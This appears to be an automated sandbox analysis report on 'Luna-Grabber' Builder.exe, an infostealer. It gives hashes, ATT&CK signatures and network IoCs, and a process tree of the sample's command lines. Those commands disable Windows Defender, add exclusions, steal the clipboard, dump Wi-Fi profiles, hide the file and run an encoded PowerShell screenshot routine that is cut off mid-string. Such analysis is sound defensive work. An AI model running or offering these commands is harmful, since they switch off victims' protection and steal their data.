e1a5ef2777acf33ec21f7dc25bb4b1beec3b6f12752385b1d6d07d8ae917c078

Analysis

max time kernel
428s
max time network
460s
platform
windows11-21h2_x64
resource
win11-20241007-en
resource tags

arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
submitted
29-01-2025 14:32

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Luna-Grabber-main/Builder.exe
Size

7.3MB
MD5

a215edd9d9788492b561858e44184bca
SHA1

77d8816ecce79f525c118687149e2f3b68dcb984
SHA256

7fbbefdae9adf0f81808b9decf48c08ba4a47293e80cd4855c083ab1f392c184
SHA512

64dfdf28e74a95af3cef3ad89b45d656bb49fba705665aad7878a397f18ae1c1a7e1aca2df466e80179f130b5350f0ac1eea26affe940742c2c42b8930f035ff
SSDEEP

196608:uuWYS6uOshoKMuIkhVastRL5Di3uq1D7mW:IYShOshouIkPftRL54DRX

Score

8^/10

collection credential_access defense_evasion discovery execution persistence privilege_escalation spyware stealer upx

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2204	powershell.exe
3332	powershell.exe
3328	powershell.exe
4040	powershell.exe

Drops file in Drivers directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Builder.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
2472	cmd.exe
2828	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
3748	rar.exe

Loads dropped DLL 17 IoCs

pid	Process
2716	Builder.exe
2716	Builder.exe
2716	Builder.exe
2716	Builder.exe
2716	Builder.exe
2716	Builder.exe
2716	Builder.exe
2716	Builder.exe
2716	Builder.exe
2716	Builder.exe
2716	Builder.exe
2716	Builder.exe
2716	Builder.exe
2716	Builder.exe
2716	Builder.exe
2716	Builder.exe
2716	Builder.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
1	discord.com
5	discord.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
1	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 5 IoCs

discovery

Process Discovery

T1057

pid	Process
2524	tasklist.exe
4780	tasklist.exe
1484	tasklist.exe
3380	tasklist.exe
4432	tasklist.exe

Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
1920	cmd.exe

UPX packed file 59 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x004600000002aba3-21.dat	upx
behavioral1/memory/2716-25-0x00007FF9FF910000-0x00007FF9FFEF9000-memory.dmp	upx
behavioral1/files/0x001900000002ab8f-27.dat	upx
behavioral1/files/0x001900000002ab9f-30.dat	upx
behavioral1/memory/2716-48-0x00007FFA0DBF0000-0x00007FFA0DBFF000-memory.dmp	upx
behavioral1/memory/2716-47-0x00007FFA08070000-0x00007FFA08093000-memory.dmp	upx
behavioral1/files/0x001900000002ab99-46.dat	upx
behavioral1/files/0x001c00000002ab98-45.dat	upx
behavioral1/files/0x001900000002ab97-44.dat	upx
behavioral1/files/0x001900000002ab94-43.dat	upx
behavioral1/files/0x001900000002ab93-42.dat	upx
behavioral1/files/0x001900000002ab91-41.dat	upx
behavioral1/files/0x001900000002ab90-40.dat	upx
behavioral1/files/0x001900000002ab8e-39.dat	upx
behavioral1/files/0x001c00000002abaa-38.dat	upx
behavioral1/files/0x001900000002aba9-37.dat	upx
behavioral1/files/0x001900000002aba6-36.dat	upx
behavioral1/files/0x001900000002aba0-33.dat	upx
behavioral1/files/0x001c00000002ab9e-32.dat	upx
behavioral1/memory/2716-54-0x00007FFA08040000-0x00007FFA0806D000-memory.dmp	upx
behavioral1/memory/2716-56-0x00007FFA0DBA0000-0x00007FFA0DBB9000-memory.dmp	upx
behavioral1/memory/2716-58-0x00007FFA08010000-0x00007FFA08033000-memory.dmp	upx
behavioral1/memory/2716-60-0x00007FFA042F0000-0x00007FFA04467000-memory.dmp	upx
behavioral1/memory/2716-62-0x00007FFA0DB20000-0x00007FFA0DB39000-memory.dmp	upx
behavioral1/memory/2716-64-0x00007FFA0D9B0000-0x00007FFA0D9BD000-memory.dmp	upx
behavioral1/memory/2716-66-0x00007FFA07440000-0x00007FFA07473000-memory.dmp	upx
behavioral1/memory/2716-72-0x00007FFA04100000-0x00007FFA041CD000-memory.dmp	upx
behavioral1/memory/2716-73-0x00007FFA03850000-0x00007FFA03D70000-memory.dmp	upx
behavioral1/memory/2716-71-0x00007FFA08070000-0x00007FFA08093000-memory.dmp	upx
behavioral1/memory/2716-79-0x00007FFA09610000-0x00007FFA0961D000-memory.dmp	upx
behavioral1/memory/2716-78-0x00007FFA08040000-0x00007FFA0806D000-memory.dmp	upx
behavioral1/memory/2716-82-0x00007FF9F2CA0000-0x00007FF9F2DBC000-memory.dmp	upx
behavioral1/memory/2716-81-0x00007FFA0DBA0000-0x00007FFA0DBB9000-memory.dmp	upx
behavioral1/memory/2716-76-0x00007FFA09940000-0x00007FFA09954000-memory.dmp	upx
behavioral1/memory/2716-70-0x00007FF9FF910000-0x00007FF9FFEF9000-memory.dmp	upx
behavioral1/memory/2716-106-0x00007FFA08010000-0x00007FFA08033000-memory.dmp	upx
behavioral1/memory/2716-107-0x00007FFA042F0000-0x00007FFA04467000-memory.dmp	upx
behavioral1/memory/2716-183-0x00007FFA0DB20000-0x00007FFA0DB39000-memory.dmp	upx
behavioral1/memory/2716-248-0x00007FFA07440000-0x00007FFA07473000-memory.dmp	upx
behavioral1/memory/2716-251-0x00007FFA04100000-0x00007FFA041CD000-memory.dmp	upx
behavioral1/memory/2716-252-0x00007FFA03850000-0x00007FFA03D70000-memory.dmp	upx
behavioral1/memory/2716-294-0x00007FFA042F0000-0x00007FFA04467000-memory.dmp	upx
behavioral1/memory/2716-288-0x00007FF9FF910000-0x00007FF9FFEF9000-memory.dmp	upx
behavioral1/memory/2716-289-0x00007FFA08070000-0x00007FFA08093000-memory.dmp	upx
behavioral1/memory/2716-317-0x00007FF9F2CA0000-0x00007FF9F2DBC000-memory.dmp	upx
behavioral1/memory/2716-319-0x00007FFA08070000-0x00007FFA08093000-memory.dmp	upx
behavioral1/memory/2716-327-0x00007FFA04100000-0x00007FFA041CD000-memory.dmp	upx
behavioral1/memory/2716-326-0x00007FFA07440000-0x00007FFA07473000-memory.dmp	upx
behavioral1/memory/2716-325-0x00007FFA0D9B0000-0x00007FFA0D9BD000-memory.dmp	upx
behavioral1/memory/2716-324-0x00007FFA0DB20000-0x00007FFA0DB39000-memory.dmp	upx
behavioral1/memory/2716-323-0x00007FFA042F0000-0x00007FFA04467000-memory.dmp	upx
behavioral1/memory/2716-322-0x00007FFA08010000-0x00007FFA08033000-memory.dmp	upx
behavioral1/memory/2716-321-0x00007FFA0DBA0000-0x00007FFA0DBB9000-memory.dmp	upx
behavioral1/memory/2716-320-0x00007FFA08040000-0x00007FFA0806D000-memory.dmp	upx
behavioral1/memory/2716-318-0x00007FFA0DBF0000-0x00007FFA0DBFF000-memory.dmp	upx
behavioral1/memory/2716-314-0x00007FFA03850000-0x00007FFA03D70000-memory.dmp	upx
behavioral1/memory/2716-303-0x00007FF9FF910000-0x00007FF9FFEF9000-memory.dmp	upx
behavioral1/memory/2716-316-0x00007FFA09610000-0x00007FFA0961D000-memory.dmp	upx
behavioral1/memory/2716-315-0x00007FFA09940000-0x00007FFA09954000-memory.dmp	upx

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
2544	PING.EXE
3428	cmd.exe

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
1128	cmd.exe
3116	netsh.exe

Detects videocard installed 1 TTPs 3 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
4944	WMIC.exe
2208	WMIC.exe
1232	WMIC.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
5040	systeminfo.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
2544	PING.EXE

Suspicious behavior: EnumeratesProcesses 18 IoCs

pid	Process
3332	powershell.exe
4040	powershell.exe
3332	powershell.exe
4040	powershell.exe
2828	powershell.exe
2828	powershell.exe
2828	powershell.exe
4324	powershell.exe
4324	powershell.exe
4324	powershell.exe
3328	powershell.exe
3328	powershell.exe
2144	powershell.exe
2144	powershell.exe
2204	powershell.exe
2204	powershell.exe
3172	powershell.exe
3172	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeIncreaseQuotaPrivilege	4324	WMIC.exe
Token: SeSecurityPrivilege	4324	WMIC.exe
Token: SeTakeOwnershipPrivilege	4324	WMIC.exe
Token: SeLoadDriverPrivilege	4324	WMIC.exe
Token: SeSystemProfilePrivilege	4324	WMIC.exe
Token: SeSystemtimePrivilege	4324	WMIC.exe
Token: SeProfSingleProcessPrivilege	4324	WMIC.exe
Token: SeIncBasePriorityPrivilege	4324	WMIC.exe
Token: SeCreatePagefilePrivilege	4324	WMIC.exe
Token: SeBackupPrivilege	4324	WMIC.exe
Token: SeRestorePrivilege	4324	WMIC.exe
Token: SeShutdownPrivilege	4324	WMIC.exe
Token: SeDebugPrivilege	4324	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4324	WMIC.exe
Token: SeRemoteShutdownPrivilege	4324	WMIC.exe
Token: SeUndockPrivilege	4324	WMIC.exe
Token: SeManageVolumePrivilege	4324	WMIC.exe
Token: 33	4324	WMIC.exe
Token: 34	4324	WMIC.exe
Token: 35	4324	WMIC.exe
Token: 36	4324	WMIC.exe
Token: SeDebugPrivilege	3332	powershell.exe
Token: SeDebugPrivilege	1484	tasklist.exe
Token: SeDebugPrivilege	4040	powershell.exe
Token: SeIncreaseQuotaPrivilege	4324	WMIC.exe
Token: SeSecurityPrivilege	4324	WMIC.exe
Token: SeTakeOwnershipPrivilege	4324	WMIC.exe
Token: SeLoadDriverPrivilege	4324	WMIC.exe
Token: SeSystemProfilePrivilege	4324	WMIC.exe
Token: SeSystemtimePrivilege	4324	WMIC.exe
Token: SeProfSingleProcessPrivilege	4324	WMIC.exe
Token: SeIncBasePriorityPrivilege	4324	WMIC.exe
Token: SeCreatePagefilePrivilege	4324	WMIC.exe
Token: SeBackupPrivilege	4324	WMIC.exe
Token: SeRestorePrivilege	4324	WMIC.exe
Token: SeShutdownPrivilege	4324	WMIC.exe
Token: SeDebugPrivilege	4324	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4324	WMIC.exe
Token: SeRemoteShutdownPrivilege	4324	WMIC.exe
Token: SeUndockPrivilege	4324	WMIC.exe
Token: SeManageVolumePrivilege	4324	WMIC.exe
Token: 33	4324	WMIC.exe
Token: 34	4324	WMIC.exe
Token: 35	4324	WMIC.exe
Token: 36	4324	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4944	WMIC.exe
Token: SeSecurityPrivilege	4944	WMIC.exe
Token: SeTakeOwnershipPrivilege	4944	WMIC.exe
Token: SeLoadDriverPrivilege	4944	WMIC.exe
Token: SeSystemProfilePrivilege	4944	WMIC.exe
Token: SeSystemtimePrivilege	4944	WMIC.exe
Token: SeProfSingleProcessPrivilege	4944	WMIC.exe
Token: SeIncBasePriorityPrivilege	4944	WMIC.exe
Token: SeCreatePagefilePrivilege	4944	WMIC.exe
Token: SeBackupPrivilege	4944	WMIC.exe
Token: SeRestorePrivilege	4944	WMIC.exe
Token: SeShutdownPrivilege	4944	WMIC.exe
Token: SeDebugPrivilege	4944	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4944	WMIC.exe
Token: SeRemoteShutdownPrivilege	4944	WMIC.exe
Token: SeUndockPrivilege	4944	WMIC.exe
Token: SeManageVolumePrivilege	4944	WMIC.exe
Token: 33	4944	WMIC.exe
Token: 34	4944	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4544 wrote to memory of 2716	4544	Builder.exe	77
PID 4544 wrote to memory of 2716	4544	Builder.exe	77
PID 2716 wrote to memory of 556	2716	Builder.exe	78
PID 2716 wrote to memory of 556	2716	Builder.exe	78
PID 2716 wrote to memory of 900	2716	Builder.exe	79
PID 2716 wrote to memory of 900	2716	Builder.exe	79
PID 2716 wrote to memory of 2988	2716	Builder.exe	80
PID 2716 wrote to memory of 2988	2716	Builder.exe	80
PID 2716 wrote to memory of 3892	2716	Builder.exe	84
PID 2716 wrote to memory of 3892	2716	Builder.exe	84
PID 2716 wrote to memory of 3656	2716	Builder.exe	86
PID 2716 wrote to memory of 3656	2716	Builder.exe	86
PID 3656 wrote to memory of 4324	3656	cmd.exe	88
PID 3656 wrote to memory of 4324	3656	cmd.exe	88
PID 556 wrote to memory of 4040	556	cmd.exe	89
PID 556 wrote to memory of 4040	556	cmd.exe	89
PID 900 wrote to memory of 3332	900	cmd.exe	90
PID 900 wrote to memory of 3332	900	cmd.exe	90
PID 2988 wrote to memory of 2780	2988	cmd.exe	91
PID 2988 wrote to memory of 2780	2988	cmd.exe	91
PID 3892 wrote to memory of 1484	3892	cmd.exe	92
PID 3892 wrote to memory of 1484	3892	cmd.exe	92
PID 2716 wrote to memory of 72	2716	Builder.exe	94
PID 2716 wrote to memory of 72	2716	Builder.exe	94
PID 72 wrote to memory of 1028	72	cmd.exe	146
PID 72 wrote to memory of 1028	72	cmd.exe	146
PID 2716 wrote to memory of 1556	2716	Builder.exe	97
PID 2716 wrote to memory of 1556	2716	Builder.exe	97
PID 1556 wrote to memory of 3168	1556	cmd.exe	151
PID 1556 wrote to memory of 3168	1556	cmd.exe	151
PID 2716 wrote to memory of 4996	2716	Builder.exe	100
PID 2716 wrote to memory of 4996	2716	Builder.exe	100
PID 4996 wrote to memory of 4944	4996	cmd.exe	102
PID 4996 wrote to memory of 4944	4996	cmd.exe	102
PID 2716 wrote to memory of 768	2716	Builder.exe	103
PID 2716 wrote to memory of 768	2716	Builder.exe	103
PID 768 wrote to memory of 2208	768	cmd.exe	105
PID 768 wrote to memory of 2208	768	cmd.exe	105
PID 2716 wrote to memory of 1920	2716	Builder.exe	106
PID 2716 wrote to memory of 1920	2716	Builder.exe	106
PID 1920 wrote to memory of 4828	1920	cmd.exe	108
PID 1920 wrote to memory of 4828	1920	cmd.exe	108
PID 2716 wrote to memory of 1364	2716	Builder.exe	109
PID 2716 wrote to memory of 1364	2716	Builder.exe	109
PID 2716 wrote to memory of 1496	2716	Builder.exe	110
PID 2716 wrote to memory of 1496	2716	Builder.exe	110
PID 2716 wrote to memory of 2436	2716	Builder.exe	113
PID 2716 wrote to memory of 2436	2716	Builder.exe	113
PID 1496 wrote to memory of 3380	1496	cmd.exe	115
PID 1496 wrote to memory of 3380	1496	cmd.exe	115
PID 1364 wrote to memory of 4432	1364	cmd.exe	116
PID 1364 wrote to memory of 4432	1364	cmd.exe	116
PID 2716 wrote to memory of 2472	2716	Builder.exe	117
PID 2716 wrote to memory of 2472	2716	Builder.exe	117
PID 2716 wrote to memory of 1984	2716	Builder.exe	118
PID 2716 wrote to memory of 1984	2716	Builder.exe	118
PID 2716 wrote to memory of 960	2716	Builder.exe	119
PID 2716 wrote to memory of 960	2716	Builder.exe	119
PID 2436 wrote to memory of 2768	2436	cmd.exe	123
PID 2436 wrote to memory of 2768	2436	cmd.exe	123
PID 2716 wrote to memory of 1128	2716	Builder.exe	124
PID 2716 wrote to memory of 1128	2716	Builder.exe	124
PID 2716 wrote to memory of 4700	2716	Builder.exe	126
PID 2716 wrote to memory of 4700	2716	Builder.exe	126

Views/modifies file attributes 1 TTPs 3 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
4828	attrib.exe
3532	attrib.exe
3168	attrib.exe

C:\Users\Admin\AppData\Local\Temp\Luna-Grabber-main\Builder.exe
"C:\Users\Admin\AppData\Local\Temp\Luna-Grabber-main\Builder.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4544
- C:\Users\Admin\AppData\Local\Temp\Luna-Grabber-main\Builder.exe
  "C:\Users\Admin\AppData\Local\Temp\Luna-Grabber-main\Builder.exe"
  2⤵
  - Drops file in Drivers directory
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:2716
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Luna-Grabber-main\Builder.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:556
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Luna-Grabber-main\Builder.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4040
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:900
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3332
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Failed to open Builder.exe! Please turn off your Anti-Virus. If you think this is a mistake please contact DexterWasHere#2952 on Discord', 0, 'Error02', 0+16);close()""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2988
  - - C:\Windows\system32\mshta.exe
      mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Failed to open Builder.exe! Please turn off your Anti-Virus. If you think this is a mistake please contact DexterWasHere#2952 on Discord', 0, 'Error02', 0+16);close()"
      4⤵
      PID:2780
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3892
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:1484
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3656
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4324
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:72
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
      4⤵
      PID:1028
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1556
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
      4⤵
      PID:3168
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4996
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      Suspicious use of AdjustPrivilegeToken
      PID:4944
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:768
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:2208
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\Luna-Grabber-main\Builder.exe""
    3⤵
    - Hide Artifacts: Hidden Files and Directories
    - Suspicious use of WriteProcessMemory
    PID:1920
  - - C:\Windows\system32\attrib.exe
      attrib +h +s "C:\Users\Admin\AppData\Local\Temp\Luna-Grabber-main\Builder.exe"
      4⤵
      Views/modifies file attributes
      PID:4828
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1364
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:4432
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1496
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:3380
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2436
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      PID:2768
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    PID:2472
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      Suspicious behavior: EnumeratesProcesses
      PID:2828
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:1984
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:2524
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:960
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:5028
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    3⤵
    - System Network Configuration Discovery: Wi-Fi Discovery
    PID:1128
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profile
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:3116
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    PID:4700
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:5040
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
    3⤵
    PID:1404
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
      4⤵
      PID:2008
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAA